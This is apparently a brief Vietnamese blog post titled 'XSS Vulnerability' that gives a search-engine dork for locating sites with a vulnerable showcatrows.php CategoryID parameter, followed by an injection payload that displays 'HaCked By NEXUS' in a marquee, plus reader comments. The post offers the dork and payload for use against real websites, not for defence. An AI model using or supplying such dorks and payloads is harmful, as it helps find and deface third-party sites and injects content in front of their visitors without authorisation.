XSS Vulnerability

Dork:

inurl:”/showcatrows.php?CategoryID=”

Exploit:

“><marquee><h1>HaCked By NEXUS</h1></marquee>

Để lại bình luận

1 Bình luận on "XSS Vulnerability"

avatar
newest oldest
Lâm Trung Tính | <span class="wpdiscuz-comment-count">948 comments</span>

ngắn gọn, rõ ràng, chính xác
–>> Nhưng mình không hiểu đâu thật ><